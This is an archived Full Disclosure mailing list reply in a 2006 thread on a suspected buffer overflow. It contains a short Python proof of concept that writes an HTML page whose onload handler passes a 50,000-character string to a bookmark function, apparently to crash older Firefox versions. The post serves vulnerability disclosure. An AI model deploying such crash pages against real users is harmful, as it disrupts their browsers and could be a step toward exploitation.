Full Disclosure mailing list archives
Buffer Overflow vulnerability in Windows Display Manager [Suspected]
From: casiamo <casiamo () gmail com>
Date: Mon, 2 Jan 2006 17:09:51 +0100
Hello Sumit, I saw this for some time ago too and I far as I know the below code would do the same, with the versions below 1.0.7. As I remember were all input fields "vulnerable". I have choosen the bookmark "name" field, which will popup after loading with a long buffer. html = open("firefox.html", "w") buff = 'A' * 50000 html.write("<html><head>\n" "<script type=\"text/javascript\">\n" "function bookmarksite(title, url){\n" "if (document.all)\n" "window.external.AddFavorite(url, title);\n" "else if (window.sidebar)\n" "window.sidebar.addPanel(title, url, \"\")}\n" "</script></head>\n" "<body onload=\"javascript:bookmarksite('"+buff+"', 'http://www.mozilla.org')\"
\n"
"</body></html>") html.close() Regards, Casiamo
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected], (continued)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Lise Moorveld (Jan 02)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Stan Bubrouski (Jan 02)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 02)
- RE: Buffer Overflow vulnerability in WindowsDisplay Manager [Suspected] Paul (Jan 03)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] ad () heapoverflow com (Jan 02)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Sumit Siddharth (Jan 02)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Sumit Siddharth (Jan 03)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] ad () heapoverflow com (Jan 03)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 03)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] InfoSecBOFH (Jan 03)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Stan Bubrouski (Jan 02)
- Re: Buffer Overflow vulnerability in Windows Display Manager [Suspected] Lise Moorveld (Jan 02)